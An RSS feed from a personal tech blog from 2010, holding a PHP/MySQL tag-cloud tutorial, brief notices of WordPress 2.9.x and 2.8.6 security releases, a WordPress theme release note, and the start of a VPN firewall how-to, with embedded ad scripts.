<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>T. Longren</title>
	
	<link>http://www.longren.org</link>
	<description>Certified &amp; Decorated</description>
	<lastBuildDate>Thu, 25 Feb 2010 05:18:00 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<feedburner:info uri="tlongren" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><geo:lat>42.026021</geo:lat><geo:long>-93.448408</geo:long><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://www.longren.org/feed/" /><feedburner:browserFriendly>This is an XML content feed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use.</feedburner:browserFriendly><item>
		<title>How To: Build a Tag Cloud with PHP, MySQL, and CSS</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/d8rcRgPFy5w/</link>
		<comments>http://www.longren.org/2010/02/24/how-to-build-a-tag-cloud-with-php-mysql-and-css/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 04:23:43 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[how-to]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[mysql]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2526</guid>
		<description><![CDATA[Tag clouds are everywhere. They are a popular way to show the weight (read: popularity) of tags, categories, or any words really. I needed to build a tag cloud for a project at work to display categories and show how many questions were contained inside each category. Categories with more questions would need a larger [...]]]></description>
			<content:encoded><![CDATA[<p>Tag clouds are everywhere. They are a popular way to show the weight (read: popularity) of tags, categories, or any words really. I needed to build a tag cloud for a project at work to display categories and show how many questions were contained inside each category. Categories with more questions would need a larger font, and categories with fewer questions would need smaller fonts. I came across <a href="http://stevethomas.com.au/php/how-to-make-a-tag-cloud-in-php-mysql-and-css.html">this post</a> from <a href="http://stevethomas.com.au/">Steve Thomas</a> titled <a href="http://stevethomas.com.au/php/how-to-make-a-tag-cloud-in-php-mysql-and-css.html"><em>How to make a tag cloud in PHP, MySQL and CSS</em></a>.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
Steve&#8217;s code is exactly what I was looking for. I made a few modifications to his code and wrapped it all into a custom PHP function, which you can see below.</p>
<p>The function returns an array that contains each category name, the CSS class that should be applied to the given category, and the category ID for linking to the page showing only questions in that category.</p>
<pre class="brush:js">
&lt;?php
function tagCloud($maximum=0) {
	$cats = array(); // create empty array

	$query = mysql_query("SELECT categories.catDesc, categories.catId, COUNT( questions.id ) AS totalQuestions FROM questions, categories WHERE questions.categoryId = categories.catId GROUP BY categories.catId;");
	while ($row = mysql_fetch_array($query)) {
		$cat = $row['catDesc'];
		$counter = $row['totalQuestions'];
		$catid = $row['catID'];

		// update $maximum if this term is more popular than the previous terms
		if ($counter> $maximum) $maximum = $counter;

		$percent = floor(($counter / $maximum) * 100);
		if ($percent <20) {
			$class = 'smallest';
		}
		elseif ($percent>= 20 and $percent <40) {
			$class = 'small';
		}
		elseif ($percent>= 40 and $percent <60) {
			$class = 'medium';
		}
		elseif ($percent>= 60 and $percent <80) {
			$class = 'large';
		}
		else {
			$class = 'largest';
		}
		$cats[] = array('term' => $cat, 'class' => $class, 'catid' => $catid);

	}
	return $cats;
}
?>
</pre>
<p>You&#8217;ll also need some CSS to style your tag cloud. This CSS is pretty much identical to what Steve published, I only made some minor changes to font sizes.</p>
<pre class="brush:js">
#tagcloud {
    width: 300px;
    background:#FFFFCC;
    color:#0066FF;
    padding: 10px;
    border: 1px solid #FFE7B6;
    text-align:center;
}

#tagcloud a:link, #tagcloud a:visited {
    text-decoration:none;
}

#tagcloud a:hover, #tagcloud a:active {
    text-decoration: underline;
    color: #000;
}

#tagcloud span {
    padding: 4px;
}

.smallest {
    font-size: 10px;
}

.small {
    font-size: 12px;
}

.medium {
    font-size:14px;
}

.large {
    font-size:16px;
}

.largest {
    font-size:18px;
}
</pre>
<p>To use the function, do something like this:</p>
<pre class="brush:js">
&lt;div id="tagcloud">
&lt;?php
$tagCloud = tagCloud();
foreach ($tagCloud as $t) {
	$cat = $t['term'];
	$class = $t['class'];
	$catid = $t['catid'];
	print "<span class=\\"$class\\"><a href="category.php?id=$catid">$cat</a></span>";
}
?>
&lt;/div>
</pre>
<p>I am still testing this code, but so far it seems to do exactly what I need it to do. If you experience trouble with the code or if it doesn&#8217;t act as expected, please let me know in the comments. If you&#8217;ve got ideas on how to improve the function, I&#8217;d love to hear your thoughts as well!</p>

<p><a href="http://feedads.g.doubleclick.net/~a/3-pwqNKIujHvrHEvB1wN5dpktMA/0/da"><img src="http://feedads.g.doubleclick.net/~a/3-pwqNKIujHvrHEvB1wN5dpktMA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/3-pwqNKIujHvrHEvB1wN5dpktMA/1/da"><img src="http://feedads.g.doubleclick.net/~a/3-pwqNKIujHvrHEvB1wN5dpktMA/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=d8rcRgPFy5w:RhFkNbxQcHA:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=d8rcRgPFy5w:RhFkNbxQcHA:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=d8rcRgPFy5w:RhFkNbxQcHA:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=d8rcRgPFy5w:RhFkNbxQcHA:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=d8rcRgPFy5w:RhFkNbxQcHA:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/d8rcRgPFy5w" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2010/02/24/how-to-build-a-tag-cloud-with-php-mysql-and-css/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2010/02/24/how-to-build-a-tag-cloud-with-php-mysql-and-css/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.9.2</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/yD1GyLHG3MU/</link>
		<comments>http://www.longren.org/2010/02/15/wordpress-2-9-2/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 04:11:15 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2522</guid>
		<description><![CDATA[WordPress 2.9.2 was released earlier today. You can download it here. This fixes a problem that allows users that are logged in to view trash posts authored by other users.
Thomas Mackenzie alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted users signed [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2010/02/wordpress-2-9-2/">WordPress 2.9.2</a> was released earlier today. You can <a href="http://wordpress.org/download/">download it here</a>. This fixes a problem that allows users that are logged in to view trash posts authored by other users.</p>
<blockquote><p><a href="http://www.tmacuk.co.uk/">Thomas Mackenzie</a> alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted users signed up on your blog and sensitive posts in the trash, you should <a href="http://wordpress.org/download/">upgrade to 2.9.2</a>.  As always, you can visit the Tools-&gt;Upgrade menu to upgrade.</p></blockquote>
<p>Thomas Mackenzie goes into <a href="http://tmacuk.co.uk/?p=180">much greater detail</a> about the problem on <a href="http://tmacuk.co.uk/">his site</a>. Check his site out for more info on why the 2.9.2 release was necessary.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>

<p><a href="http://feedads.g.doubleclick.net/~a/gWJnVS-yzb6tEdCtndLHpBr7Scc/0/da"><img src="http://feedads.g.doubleclick.net/~a/gWJnVS-yzb6tEdCtndLHpBr7Scc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/gWJnVS-yzb6tEdCtndLHpBr7Scc/1/da"><img src="http://feedads.g.doubleclick.net/~a/gWJnVS-yzb6tEdCtndLHpBr7Scc/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=yD1GyLHG3MU:EpVLerDmrFM:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=yD1GyLHG3MU:EpVLerDmrFM:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=yD1GyLHG3MU:EpVLerDmrFM:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=yD1GyLHG3MU:EpVLerDmrFM:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=yD1GyLHG3MU:EpVLerDmrFM:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/yD1GyLHG3MU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2010/02/15/wordpress-2-9-2/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.longren.org/2010/02/15/wordpress-2-9-2/</feedburner:origLink></item>
		<item>
		<title>WordPress Theme: Unwakeable 1.5.3</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/vaFW8dGVYEI/</link>
		<comments>http://www.longren.org/2010/01/19/wordpress-theme-unwakeable-1-5-3/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 20:41:26 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>
		<category><![CDATA[wordpress-theme]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2491</guid>
		<description><![CDATA[Unwakeable 1.5.3 is available for download. This version is built off K2 1.0.3 and should work beautifully with WordPress 2.9+. You can head over to the Unwakeable page to get the download, or you can grab it here.



K2 1.0 added more support for WordPress 2.9. For example, K2 1.0 supports new WordPress features such as [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable</a> 1.5.3 is available for download. This version is built off <a href="http://getk2.com/2010/01/k2-1-0-3/">K2 1.0.3</a> and should work beautifully with WordPress 2.9+. You can head over to the <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable page</a> to get the download, or you can <a href="http://www.longren.org/downloads/unwakeable-1.5.3.zip">grab it here</a>.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
<a href="http://getk2.com/2009/12/k2-1-0/">K2 1.0</a> added more support for WordPress 2.9. For example, K2 1.0 supports new WordPress features such as <a href="http://markjaquith.wordpress.com/2009/12/23/new-in-wordpress-2-9-post-thumbnail-images/">post thumbnail images</a>. One of the more noticeable changes to K2 since the 1.0 release is the absence of SideBar Manager (SBM). It sounds like it was simply too much work to maintain SBM, and was beyond the scope of what K2 is:</p>
<blockquote><p>It’s worth mentioning that the last remnants of the old SideBar Manager, or SBM, have now been removed from the codebase. It started out as a fully-fledged replacement for WP’s lacking widgets system and ended up as a patch-of-sorts to the widget system, allowing for widgets to be placed only on specified pages. But in the end, while the native widget system is still very much in need of an update, it didn’t feel right for K2 to try and cover that particular area of the administration interface. And besides, other plugins for doing just that exist already.</p>
<p>So instead of spending our time patching that system for an ever-changing WordPress, our time is probably better spent on more theme-specific functionality, like the rolling archives or livesearch systems, as well as keeping up with new WordPress features, like for instance Post Thumbnails.</p></blockquote>
<p><script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
Rather than break down all of what&#8217;s changed in recent versions of K2, I&#8217;m going to make it easy on myself and direct you to the <a href="http://getk2.com/2009/12/k2-1-0/">K2 1.0 release announcement</a>. Just know that Unwakeable 1.5.3 sports all the features found in K2 1.0.3. You can comment on this post or on the <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable page</a> with questions or comments.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/MN23SS9wfTrpjLc1iuOrV9qm9zM/0/da"><img src="http://feedads.g.doubleclick.net/~a/MN23SS9wfTrpjLc1iuOrV9qm9zM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/MN23SS9wfTrpjLc1iuOrV9qm9zM/1/da"><img src="http://feedads.g.doubleclick.net/~a/MN23SS9wfTrpjLc1iuOrV9qm9zM/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=vaFW8dGVYEI:EaKyBl6uMuE:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=vaFW8dGVYEI:EaKyBl6uMuE:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=vaFW8dGVYEI:EaKyBl6uMuE:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=vaFW8dGVYEI:EaKyBl6uMuE:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=vaFW8dGVYEI:EaKyBl6uMuE:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/vaFW8dGVYEI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2010/01/19/wordpress-theme-unwakeable-1-5-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2010/01/19/wordpress-theme-unwakeable-1-5-3/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.9.1</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/VkAQMsGFmlw/</link>
		<comments>http://www.longren.org/2010/01/19/wordpress-2-9-1/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 17:13:25 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2489</guid>
		<description><![CDATA[WordPress 2.9.1 was released a little over two weeks ago. You can download it at the usual location.



From the release announcement:
This release addresses a handful of minor issues as well as a rather annoying problem where scheduled posts and pingbacks are not processed correctly due to incompatibilities with some hosts.  If any of these [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2010/01/wordpress-2-9-1/">WordPress 2.9.1</a> was released a little over two weeks ago. You can <a href="http://wordpress.org/download/">download</a> it at the <a href="http://wordpress.org/download/">usual location</a>.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
From the release <a href="http://wordpress.org/development/2010/01/wordpress-2-9-1/">announcement</a>:</p>
<blockquote><p>This release addresses a handful of minor issues as well as a rather annoying problem where scheduled posts and pingbacks are not processed correctly due to incompatibilities with some hosts.  If any of these issues affect you, give 2.9.1 a try.  <a href="http://wordpress.org/download/">Download 2.9.1</a> or upgrade automatically from the Tools->Upgrade menu in your blog’s admin area.</p></blockquote>
<p>WordPress 2.9.1 came less than a month after <a href="http://wordpress.org/development/2009/12/wordpress-2-9/">WordPress 2.9</a>.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/nAC7UvsrpdGY9lm3Tn6AbEQl5IY/0/da"><img src="http://feedads.g.doubleclick.net/~a/nAC7UvsrpdGY9lm3Tn6AbEQl5IY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/nAC7UvsrpdGY9lm3Tn6AbEQl5IY/1/da"><img src="http://feedads.g.doubleclick.net/~a/nAC7UvsrpdGY9lm3Tn6AbEQl5IY/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=VkAQMsGFmlw:DSe-MeCpajQ:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=VkAQMsGFmlw:DSe-MeCpajQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=VkAQMsGFmlw:DSe-MeCpajQ:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=VkAQMsGFmlw:DSe-MeCpajQ:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=VkAQMsGFmlw:DSe-MeCpajQ:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/VkAQMsGFmlw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2010/01/19/wordpress-2-9-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2010/01/19/wordpress-2-9-1/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.8.6 Security Release</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/i-_uSaFFi34/</link>
		<comments>http://www.longren.org/2009/11/14/wordpress-2-8-6-security-release/#comments</comments>
		<pubDate>Sat, 14 Nov 2009 15:32:23 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2486</guid>
		<description><![CDATA[WordPress 2.8.6 is available for download. It&#8217;s another security release and was released two days ago. Below is a summary from the WordPress development blog:
2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges.  If you have untrusted authors on your blog, upgrading to 2.8.6 is [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2009/11/wordpress-2-8-6-security-release/">WordPress 2.8.6</a> is available for <a href="http://wordpress.org/download/">download</a>. It&#8217;s another security release and was released two days ago. Below is a summary from the <a href="http://wordpress.org/development/">WordPress development blog</a>:</p>
<blockquote><p>2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges.  If you have untrusted authors on your blog, upgrading to 2.8.6 is recommended.</p>
<p>The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch.  The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.</p></blockquote>
<p>You can download WordPress 2.8.6 <a href="http://wordpress.org/download/">here</a>.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>

<p><a href="http://feedads.g.doubleclick.net/~a/qXHHNlMGYyXQ-J2PubQFCHRF7FM/0/da"><img src="http://feedads.g.doubleclick.net/~a/qXHHNlMGYyXQ-J2PubQFCHRF7FM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/qXHHNlMGYyXQ-J2PubQFCHRF7FM/1/da"><img src="http://feedads.g.doubleclick.net/~a/qXHHNlMGYyXQ-J2PubQFCHRF7FM/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=i-_uSaFFi34:0zEHMtyDht8:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=i-_uSaFFi34:0zEHMtyDht8:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=i-_uSaFFi34:0zEHMtyDht8:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=i-_uSaFFi34:0zEHMtyDht8:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=i-_uSaFFi34:0zEHMtyDht8:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/i-_uSaFFi34" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/11/14/wordpress-2-8-6-security-release/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/11/14/wordpress-2-8-6-security-release/</feedburner:origLink></item>
		<item>
		<title>How To: Cisco and Microsoft VPN Through Firestarter on Ubuntu</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/N5N1ggk0dcQ/</link>
		<comments>http://www.longren.org/2009/11/07/how-to-cisco-and-microsoft-vpn-through-firestarter-on-ubuntu/#comments</comments>
		<pubDate>Sat, 07 Nov 2009 19:57:33 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[cisco]]></category>
		<category><![CDATA[how-to]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2476</guid>
		<description><![CDATA[After doing a fresh install of Ubuntu 9.10 Karmic Koala on my router, I realized that I had lost the ability to connect to my employer&#8217;s VPN. I use Firestarter for managing my firewall on this particular router.



As I usually do, I googled &#8220;firestarter vpn&#8220;. Much to my dismay, it appeared that the Firestarter website [...]]]></description>
			<content:encoded><![CDATA[<p>After doing a fresh install of Ubuntu 9.10 Karmic Koala on my router, I realized that I had lost the ability to connect to my employer&#8217;s VPN. I use <a href="http://fs-security.com/">Firestarter</a> for managing my firewall on this particular router.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
